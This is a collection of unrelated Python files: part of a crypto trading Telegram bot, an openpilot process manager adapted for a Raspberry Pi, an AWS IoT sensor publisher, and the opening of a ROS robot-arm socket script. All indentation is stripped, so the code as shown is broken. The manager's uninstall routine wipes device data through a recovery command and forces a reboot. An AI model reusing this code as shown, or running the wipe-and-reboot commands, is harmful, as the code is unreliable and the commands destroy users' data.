buy_price = self.get_buy_price(symbol)
if buy_price > 0:
update.message.reply_text('%s possible profit: %.8f `%.2f%%`' %
(symbol, (sell_price - buy_price) * filled,
(sell_price / buy_price - 1) * 100), parse_mode=ParseMode.MARKDOWN)
time.sleep(1)
self.sell(symbol, update)
else:
time.sleep(1)
continue
elif status == 'closed':
update.message.reply_text('%s sell filled, amount:%.8f' % (symbol, amount))
buy_price = self.get_buy_price(symbol)
if buy_price > 0:
update.message.reply_text('%s possible profit: %.8f `%.2f%%`' %
(symbol, (sell_price - buy_price) * amount,
(sell_price / buy_price - 1) * 100), parse_mode=ParseMode.MARKDOWN)
else:
update.message.reply_text('%s sell failed, status:%s' % (symbol, status))
self.exchange.cancel_order(order_id, symbol)
break
def clean_sell(self, symbol):
s = self.exchange.market(symbol)
min_amount = s['limits']['amount']['min']
precision = s['precision']['amount']
min_cost = s['limits']['cost']['min']
amount = round(self.exchange.fetch_balance()['free'][s['base']] // min_amount * min_amount, precision)
last_price = self.exchange.fetch_ticker(symbol)['last']
if amount == 0 or amount * last_price > min_cost:
return
self.exchange.create_market_sell_order(symbol, amount)
def get_values(self, symbol, amount):
s = self.exchange.market(symbol)
ticker = self.exchange.fetch_ticker(symbol)
quote_value = ticker['last'] * amount
usdt_value = self.exchange.fetch_ticker('{}/USDT'.format(s['quote']))['last'] * quote_value
return ticker['last'], ticker['change'], quote_value, usdt_value
def balance(self, quote, update):
self.exchange.load_markets(reload=True)
balance = self.exchange.fetch_balance()['total']
quote_total = 0
usdt_total = 0
text = 'Your account balance: \n'
text += '%s amount: %g \n' % (quote, balance[quote])
for base in sorted(balance.keys()):
symbol = '{}/{}'.format(base, quote)
try:
s = self.exchange.market(symbol)
except Exception:
continue
min_amount = s['limits']['amount']['min']
min_cost = s['limits']['cost']['min']
amount = balance[base]
if amount < min_amount:
continue
price, change, quote_value, usdt_value = self.get_values(symbol, amount)
if quote_value < min_cost:
thread = threading.Thread(target=self.clean_sell, args=(symbol,))
thread.start()
else:
buy_price = self.get_buy_price(symbol)
if buy_price > 0:
profit = (price / buy_price - 1) * 100
else:
profit = 0
text += '%s amount: %.4f, price: %.8f, value(%s): %.4f, value(USDT): %.2f, ' \
'change(24h): %.2f%%, profit: `%.2f%%` \n' % \
(base, amount, price, quote, quote_value, usdt_value, change, profit)
quote_total += quote_value
usdt_total += usdt_value
quote_total += balance[quote]
usdt_total += balance[quote] * self.exchange.fetch_ticker('{}/USDT'.format(quote))['last']
text += 'Total in %s: %.8f, in USDT: %.2f' % (quote, quote_total, usdt_total)
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
def crossed(self, series1, series2, direction=None):
if isinstance(series1, np.ndarray):
series1 = Series(series1)
if isinstance(series2, int) or isinstance(series2, float) or isinstance(series2, np.ndarray):
series2 = Series(index=series1.index, data=series2)
if direction is None or direction == "above":
above = Series((series1 > series2) & (
series1.shift(1) <= series2.shift(1)))
if direction is None or direction == "below":
below = Series((series1 < series2) & (
series1.shift(1) >= series2.shift(1)))
if direction is None:
return above | below
return above if direction == "above" else below
def crossed_above(self, series1, series2):
return self.crossed(series1, series2, "above")
def crossed_below(self, series1, series2):
return self.crossed(series1, series2, "below")
def st_signal(self, symbol, stop_loss, take_profit):
s = self.exchange.market(symbol)
if self.exchange.fetch_balance()['total'][s['base']] > s['limits']['amount']['min']:
buy_price = self.get_buy_price(symbol)
if buy_price > 0:
sell_price = self.exchange.fetch_ticker(symbol)['last']
if (sell_price / buy_price - 1) * 100 <= stop_loss:
return 'STOP LOSS'
if (sell_price / buy_price - 1) * 100 >= take_profit:
return 'TAKE PROFIT'
return 'neutral'
def ta_signal(self, symbol, time_frame):
data = self.exchange.fetch_ohlcv(symbol, time_frame)
df = DataFrame(data, columns=['time', 'open', 'high', 'low', 'close', 'volume'])
df.set_index('time', inplace=True, drop=True)
df['rsi'] = ta.RSI(df)
df['adx'] = ta.ADX(df)
df['plus_di'] = ta.PLUS_DI(df)
df['minus_di'] = ta.MINUS_DI(df)
df['fastd'] = ta.STOCHF(df)['fastd']
df.loc[
(
(df['rsi'] < 35) &
(df['fastd'] < 35) &
(df['adx'] > 30) &
(df['plus_di'] > 0.5)
) |
(
(df['adx'] > 65) &
(df['plus_di'] > 0.5)
),
'buy'] = 1
df.loc[
(
(
(self.crossed_above(df['rsi'], 70)) |
(self.crossed_above(df['fastd'], 70))
) &
(df['adx'] > 10) &
(df['minus_di'] > 0)
) |
(
(df['adx'] > 70) &
(df['minus_di'] > 0.5)
),
'sell'] = 1
buy_signal, sell_signal = df.iloc[-1]['buy'], df.iloc[-1]['sell']
if buy_signal == 1:
return 'BUY'
elif sell_signal == 1:
return 'SELL'
return 'neutral'
def dl_signal(self, symbol, time_frame):
data = self.exchange.fetch_ohlcv(symbol, time_frame)
df = DataFrame(data, columns=['time', 'open', 'high', 'low', 'close', 'volume'])
df.set_index('time', inplace=True, drop=True)
df.replace({0: np.nan}, inplace=True)
df['price'] = df[['open', 'high', 'low', 'close']].mean(axis=1)
df['price_change'] = df['price'].pct_change()
df['volume_change'] = df['volume'].pct_change()
df = df.assign(**{'volatility': lambda x: (x['high'] - x['low']) / x['open']})
df = df.assign(**{'convergence': lambda x: (x['open'] - x['close']) / (x['high'] - x['low'])})
df = df.assign(**{'predisposition': lambda x: 1 - 2 * (x['high'] - x['close']) / (x['high'] - x['low'])})
df.dropna(axis=0, how='any', inplace=True)
sc = MinMaxScaler(feature_range=(-1, 1))
input_data = sc.fit_transform(df[['price_change', 'volume_change', 'volatility', 'convergence', 'predisposition']])
if len(input_data) >= 5:
output_data = input_data[:, 0]
mean = np.mean(output_data, axis=0)
last_change = output_data[-1] - mean
with self.graph.as_default():
predict_change = self.model.predict(np.array([input_data[-5:]]), batch_size=1)[0][0] - mean
# Buy when the last mean-centred change was negative but the model predicts a rise
# above +0.1; sell on the mirror condition (last change positive, predicted drop
# below -0.1).
if last_change < 0 < .1 < predict_change:
return 'BUY'
elif last_change > 0 > -.1 > predict_change:
return 'SELL'
return 'neutral'
def scan(self, quote, update, time_frames=TIME_FRAMES, stop_loss=-5, take_profit=5, auto_st=False):
self.exchange.load_markets(reload=True)
balance = self.exchange.fetch_balance()['total']
symbols = []
for base in balance.keys():
amount = balance[base]
symbol = '{}/{}'.format(base, quote)
try:
if amount >= self.exchange.market(symbol)['limits']['amount']['min']:
symbols.append(symbol)
except Exception:
continue
for symbol in self.exchange.symbols:
if symbol.split('/')[1] == quote:
time.sleep(0.1)
change = self.exchange.fetch_ticker(symbol)['change']
if change > 0 or symbol in symbols:
if symbol in symbols:
st = self.st_signal(symbol, stop_loss, take_profit)
else:
st = 'neutral'
tas = []
dls = []
ta_text = ''
dl_text = ''
score = 0
for time_frame in time_frames:
time.sleep(0.1)
t = self.ta_signal(symbol, time_frame)
d = self.dl_signal(symbol, time_frame)
tas.append(t)
dls.append(d)
ta_text += '{}: {}, '.format(time_frame, t)
dl_text += '{}: {}, '.format(time_frame, d)
if t == 'BUY':
score += 1
elif t == 'SELL':
score += -1
if d == 'BUY':
score += 1
elif d == 'SELL':
score += -1
if score > 0:
text = '`+++ BUY +++` \n%s change(24h): %.2f%% \n' \
'TA signal: %s \nDL signal: %s \nScore: `%d%%`' % \
(symbol, change, ta_text, dl_text, score / len(time_frames) / 2 * 100)
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
elif symbol in symbols and (st != 'neutral' or score < 0):
text = '`--- SELL ---` \n%s change(24h): %.2f%% \n' \
'ST signal: %s \nTA signal: %s \nDL signal: %s \nScore: `%d%%`' % \
(symbol, change, st, ta_text, dl_text, score / len(time_frames) / 2 * 100)
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
|
manager.py
|
#!/usr/bin/env python3.5
# manager will start all required processes (Python, C, C++)
# for testing see also https://medium.com/@comma_ai/open-sourcing-openpilot-development-tools-a5bc427867b6
import os
import sys
import fcntl
import errno
import signal
import subprocess
#import logging
# instead of setting the PYTHONPATH environment variable, it is better to extend sys.path here:
sys.path.append("/home/pi/openpilot")
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode("utf-8"))
except (OSError, IOError):
pass
os._exit(os.wait()[1])
# update NEOS routine
# not required on Rpi
if __name__ == "__main__":
neos_update_required = os.path.isfile("/init.qcom.rc") \
and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 8)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
cloudlog.info('Cloudlog info level is activated')
# comment out anything you don't want to run
# compilation of orb is an issue because it uses screen functions and an include file that is not available in a headless env
# loggerd is compiled, so don't run it; it's only logging anyway...
# gpsd replaced by gps.py
# and geofence added
managed_processes = {
"thermald": "selfdrive.thermald",
# "uploader": "selfdrive.loggerd.uploader",
"controlsd": "selfdrive.controls.controlsd",
"radard": "selfdrive.controls.radard",
# "ubloxd": "selfdrive.locationd.ubloxd",
# "mapd": "selfdrive.mapd.mapd",
# "loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
# "tombstoned": "selfdrive.tombstoned",
# "logcatd": ("selfdrive/logcatd", ["./logcatd"]),
# "proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": "selfdrive.boardd.boardd", # use python version
# "boardd": ("selfdrive/boardd", ["./boardd"]), # use python version
"pandad": "selfdrive.pandad",
# "ui": ("selfdrive/ui", ["./start.sh"]),
"calibrationd": "selfdrive.locationd.calibrationd",
# "visiond": ("selfdrive/visiond", ["./visiond"]),
# "sensord": ("selfdrive/sensord", ["./sensord"]),
# "gpsd": ("selfdrive/sensord", ["./gpsd"]),
"gpsd": "selfdrive.sensord.gps",
"geofence": "selfdrive.sensord.geofence",
# "orbd": ("selfdrive/orbd", ["./orbd_wrapper.sh"]),
# "updated": "selfdrive.updated",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'gpsd',
'geofence',
'updated',
]
car_started_processes = [
'controlsd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'visiond',
'proclogd',
'ubloxd',
'orbd',
'mapd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
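# --- editor's sketch (not part of the original file): an example call to
# register_managed_process(). The module path below is hypothetical; registering only records
# the descriptor in managed_processes and one of the start lists, nothing is imported or
# started at this point.
def _sketch_register_example():
  register_managed_process("examples_heartbeat", "selfdrive.examples.heartbeat", car_started=False)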
# ****************** process management functions ******************
def launcher(proc, gctx):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# exec the process
mod.main(gctx)
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
# native processes may fail
try:
os.execvp(pargs[0], pargs)
except OSError:
cloudlog.info("Warning: native process not started: " + pargs[0] + " in directory " + cwd)
def start_managed_process(name):
if name in running or name not in managed_processes:
# cloudlog.info("name not in managed processes: %s" % name)
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc, gctx))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
# retrying the build after `make clean` was intentionally disabled here (see the commented line below)
# subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
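# --- editor's sketch (not part of the original file): kill_managed_process() escalates from a
# polite terminate()/SIGINT to SIGKILL. The generic helper below shows the same escalation on
# a plain multiprocessing.Process, without the manager's bookkeeping.
def _sketch_terminate_with_escalation(proc, grace=5.0):
  proc.terminate()             # polite request first (SIGTERM)
  proc.join(grace)             # give it a few seconds to exit
  if proc.exitcode is None:    # still alive: force it
    os.kill(proc.pid, signal.SIGKILL)
    proc.join()
  return proc.exitcode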
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("Killing " + name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
global gctx
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
dongle_id_str = dongle_id.decode() if isinstance(dongle_id, bytes) else dongle_id  # registration returns bytes; the dummy id above is already str
cloudlog.info("dongle id is " + dongle_id_str)
os.environ['DONGLE_ID'] = dongle_id_str
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id_str, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id_str)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# set gctx
gctx = {}
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
#--- manager thread --------------------------------------------
def manager_thread():
# now loop
context = zmq.Context()
thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
# this is closed software so it cannot run on an RPi
logger_dead = False
try:
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
except OSError:
# no worries, it is only logging
logger_dead = True
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
cloudlog.info("start pandad and boardd")
start_managed_process("pandad")
params = Params()
while 1:
# read thermal msg to check cpu temperature and free space
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
# if thermal msg is available, start all car_started processes
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check if pandad has finished and boardd is not running yet
# pandad is updating the panda module and needs to be finished before we can start boardd
# a process gives exit code 0 if it ended correctly
# exit code == None if the process is still running
if 'pandad' in running and 'boardd' not in running:
if running['pandad'].exitcode == 0:
start_managed_process('boardd')
# check the status of all processes, did any of them die?
# and minimize the number of log messages
cloudMsg = "Running: "
for p in running:
cloudMsg = cloudMsg + " %s %s, " % (p, running[p])
# cloudlog.debug(" Running %s %s" % (p, running[p]))
cloudlog.info(cloudMsg)
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
# use pm command to list all available packages, not required on Rpi
try:
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).decode("utf-8").strip().split("\n")
except FileNotFoundError:
# make empty list
dat = []
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
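# --- editor's sketch (not part of the original file): get_installed_apks() parses lines of the
# form "package:/data/app/some.app-1/base.apk=some.app" into {name: apk_path}. The helper below
# shows that parsing on a single sample line, without shelling out to pm.
def _sketch_parse_pm_line(line="package:/data/app/ai.comma.plus.frame-1/base.apk=ai.comma.plus.frame"):
  path, name = line.split("package:")[1].split("=")
  return {name: path}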
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path, "rb").read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app], "rb").read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
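# --- editor's sketch (not part of the original file): update_apks() reinstalls an apk when the
# SHA-1 of the bundled file differs from the installed one. The helper below shows the same
# comparison for two arbitrary paths, reading in binary mode and in chunks so large files do
# not have to fit in memory.
def _sketch_files_differ(path_a, path_b, chunk_size=1 << 20):
  def digest(path):
    h = hashlib.sha1()
    with open(path, "rb") as f:
      for chunk in iter(lambda: f.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()
  return digest(path_a) != digest(path_b)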
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
# cereal is capnp stuff for rpc calls to c++ and java
# subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def xstr(s):
return '' if s is None else str(s)
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
cloudlog.info('NOLOG=' + xstr(os.getenv("NOLOG")))
cloudlog.info('NOUPLOAD=' + xstr(os.getenv("NOUPLOAD")))
cloudlog.info('NOVISION=' + xstr(os.getenv("NOVISION")))
cloudlog.info('LEAN=' + xstr(os.getenv("LEAN")))
cloudlog.info('NOCONTROL=' + xstr(os.getenv("NOCONTROL")))
cloudlog.info('PASSIVE=' + xstr(os.getenv("PASSIVE")))
cloudlog.info('PREPAREONLY=' + xstr(os.getenv("PREPAREONLY")))
cloudlog.info('BASEDIR=' + xstr(os.getenv("BASEDIR")))
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process)
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("GeoFence") is None:
params.put("GeoFence", "")
if params.get("UploadWebsite") is None:
params.put("UploadWebsite", "")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
cloudlog.info('Try to start C executable Spinner=' + spinner_text)
# try/except below guards against the spinner binary being unavailable (e.g. on an RPi)
try:
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
except OSError:
cloudlog.info('C executable Spinner failed with OSError')
spinner_proc = False
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
cloudlog.info('Start main()')
main()
# manual exit because we are forked
sys.exit(0)
|
run.py
|
from aws_iot_client import AWSIOTClient
from sensor import Sensor
import time
from datetime import datetime
import threading
import json
from concurrent.futures import ProcessPoolExecutor as executor  # note: imported but currently unused
from random import random
class Config:
def __init__(self, host, rootCA, cert, privkey, clientId, devices):
self.host = host
self.rootCA = rootCA
self.cert = cert
self.privkey = privkey
self.clientId = clientId
self.devices = devices
def connect(device):
lock = device.lock
print("{} lock: {}".format(device.deviceId, lock.locked()))
if not lock.locked():
with lock:
if not device.connected:
print('Attempt to connect to {}'.format(device.deviceId), flush=True)
device.connect()
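# --- editor's sketch (not part of the original run.py): connect() relies on each Sensor
# carrying its own threading.Lock so only one background thread (re)connects a given device at
# a time. The stand-in class below is hypothetical (it is not the real Sensor) and only
# illustrates the attributes connect() expects: deviceId, lock, connected and a connect() method.
class _SketchDevice:
    def __init__(self, device_id):
        self.deviceId = device_id
        self.lock = threading.Lock()
        self.connected = False
    def connect(self):
        self.connected = True  # a real device would open its transport here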
def start_publish(devices, client):
while True:
data = []
for device in devices:
if not device.connected:
t = threading.Thread(target=connect, args=(device,))
t.start()
try:
data.append(device.get_data())
except Exception as e:
device.disconnect()
print(e)
payload = {
"clientId": client.config.clientId,
"datetime": datetime.now().replace(microsecond=0).isoformat(),
"status": "Deployed",
"members": data,
"lat": 38.5818756 + random()/4000,
"lng": -121.493181 + random()/4000
}
client.publish(payload)
time.sleep(0.2)
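# --- editor's sketch (not part of the original run.py): the payload published above has the
# shape sketched below. The dummy values are illustrative only; in the real flow clientId
# comes from config.json and members holds per-device readings from Sensor.get_data().
def _sketch_example_payload():
    return {
        "clientId": "example-client",
        "datetime": datetime.now().replace(microsecond=0).isoformat(),
        "status": "Deployed",
        "members": [],
        "lat": 38.5818756,
        "lng": -121.493181,
    }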
def main():
config_json = open('./config.json')
config = Config(**json.load(config_json))
client = AWSIOTClient(config)
devices = []
for info in config.devices:
device = Sensor(info['addr'], info['deviceId'])
devices.append(device)
start_publish(devices, client)  # note: this loops forever; the joins below only run if it returns or raises
for t in threading.enumerate():
if t is not threading.current_thread():
t.join()
if __name__ == '__main__':
main()
|
HiwinRA605_socket_ros_test_20190625195933.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them over a socket to the control PC
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # end the generator; raising StopIteration here breaks under PEP 479 (Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
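# --- editor's sketch (not part of the original file): a minimal usage example of the
# switch/case recipe above, the same pattern used later to dispatch on socket_cmd.action.
# The for loop yields match() exactly once; case(...) returns True when the value matches.
def _sketch_switch_usage(value):
    for case in switch(value):
        if case(1):
            return "one"
        if case(2, 3):
            return "two or three"
        if case():  # default: match() with no args always returns True
            return "default"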
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req): ## receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm mode data sent from the strategy side
global arm_mode_flag
